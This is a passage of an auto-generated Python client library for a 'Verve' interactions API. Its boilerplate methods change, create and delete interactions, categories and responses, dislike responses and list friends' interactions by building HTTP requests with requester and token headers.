(optional) :param int interaction_id: interactionId (required) :param int category_id: New interaction categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.change_interaction_category_with_http_info(interaction_id, category_id, requester_id, client_token, **kwargs) else: (data) = self.change_interaction_category_with_http_info(interaction_id, category_id, requester_id, client_token, **kwargs) return data def change_interaction_category_with_http_info(self, interaction_id, category_id, requester_id, client_token, **kwargs): """ Change interaction category Allows the user to change the interaction category. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_category_with_http_info(interaction_id, category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
(optional) :param int interaction_id: interactionId (required) :param int category_id: New interaction categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'category_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method change_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `change_interaction_category`") # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `change_interaction_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is 
None): raise ValueError("Missing the required parameter `requester_id` when calling `change_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `change_interaction_category`") resource_path = '/interactions/{interactionId}/{categoryId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def change_interaction_type(self, interaction_id, interaction_type, requester_id, client_token, **kwargs): """ Change interaction type Allows the user to change the interaction type. Boolean value This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_type(interaction_id, interaction_type, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_type: New interaction type (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.change_interaction_type_with_http_info(interaction_id, interaction_type, requester_id, client_token, **kwargs) else: (data) = self.change_interaction_type_with_http_info(interaction_id, interaction_type, requester_id, client_token, **kwargs) return data def change_interaction_type_with_http_info(self, interaction_id, interaction_type, requester_id, client_token, **kwargs): """ Change interaction type Allows the user to change the interaction type. Boolean value This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_type_with_http_info(interaction_id, interaction_type, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_type: New interaction type (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. 
""" all_params = ['interaction_id', 'interaction_type', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method change_interaction_type" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `change_interaction_type`") # verify the required parameter 'interaction_type' is set if ('interaction_type' not in params) or (params['interaction_type'] is None): raise ValueError("Missing the required parameter `interaction_type` when calling `change_interaction_type`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `change_interaction_type`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `change_interaction_type`") resource_path = '/interactions/{interactionId}/type'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'interaction_type' in params: form_params.append(('interactionType', params['interaction_type'])) if 'fields' in params: 
form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def create_interaction_category(self, requester_id, client_token, **kwargs): """ Create interaction category This service allows a user to create a category. The following fields(key:value) are required to be present in the Category JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. associationId 2. categoryName 3. interactionType This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_interaction_category(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionCategory body: :param str access_token: Unique session token for user. 
To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_interaction_category_with_http_info(requester_id, client_token, **kwargs) else: (data) = self.create_interaction_category_with_http_info(requester_id, client_token, **kwargs) return data def create_interaction_category_with_http_info(self, requester_id, client_token, **kwargs): """ Create interaction category This service allows a user to create a category. The following fields(key:value) are required to be present in the Category JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. associationId 2. categoryName 3. interactionType This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_interaction_category_with_http_info(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionCategory body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. 
""" all_params = ['requester_id', 'client_token', 'body', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `create_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `create_interaction_category`") resource_path = '/interactions/categories'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded', 'application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), 
_return_http_data_only=params.get('_return_http_data_only')) def delete_interaction(self, interaction_id, requester_id, client_token, **kwargs): """ Delete interaction Allows the user to delete a interaction. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.delete_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def delete_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Delete interaction Allows the user to delete a interaction. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. 
""" all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `delete_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `delete_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `delete_interaction`") resource_path = '/interactions/{interactionId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # 
Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_interaction_category(self, category_id, requester_id, client_token, **kwargs): """ Delete interaction category Allows the user to delete the interaction category. Returns the deleted interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction_category(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_interaction_category_with_http_info(category_id, requester_id, client_token, **kwargs) else: (data) = self.delete_interaction_category_with_http_info(category_id, requester_id, client_token, **kwargs) return data def delete_interaction_category_with_http_info(self, category_id, requester_id, client_token, **kwargs): """ Delete interaction category Allows the user to delete the interaction category. Returns the deleted interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction_category_with_http_info(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. 
""" all_params = ['category_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `delete_interaction_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `delete_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `delete_interaction_category`") resource_path = '/interactions/categories/{categoryId}'.replace('{format}', 'json') path_params = {} if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ 
select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_response(self, response_id, requester_id, client_token, **kwargs): """ Delete response Allows the user to delete an response. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_response(response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_response_with_http_info(response_id, requester_id, client_token, **kwargs) else: (data) = self.delete_response_with_http_info(response_id, requester_id, client_token, **kwargs) return data def delete_response_with_http_info(self, response_id, requester_id, client_token, **kwargs): """ Delete response Allows the user to delete an response. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_response_with_http_info(response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. 
""" all_params = ['response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `delete_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `delete_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `delete_response`") resource_path = '/interactions/responses/{responseId}'.replace('{format}', 'json') path_params = {} if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = 
['default'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def dislike_response(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Dislike response Allows the user to dislike the response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.dislike_response(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.dislike_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) else: (data) = self.dislike_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) return data def dislike_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Dislike response Allows the user to dislike the response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.dislike_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. 
""" all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method dislike_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `dislike_response`") # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `dislike_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `dislike_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `dislike_response`") resource_path = '/interactions/{interactionId}/responses/{responseId}/dislike'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) 
body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_friends_interactions(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions shared by friends Returns the list of interactions shared by friends This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_friends_interactions(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param int category_id: categoryId :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_friends_interactions_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_friends_interactions_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) return data def get_friends_interactions_with_http_info(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions shared by friends Returns the list of interactions shared by friends This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_friends_interactions_with_http_info(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
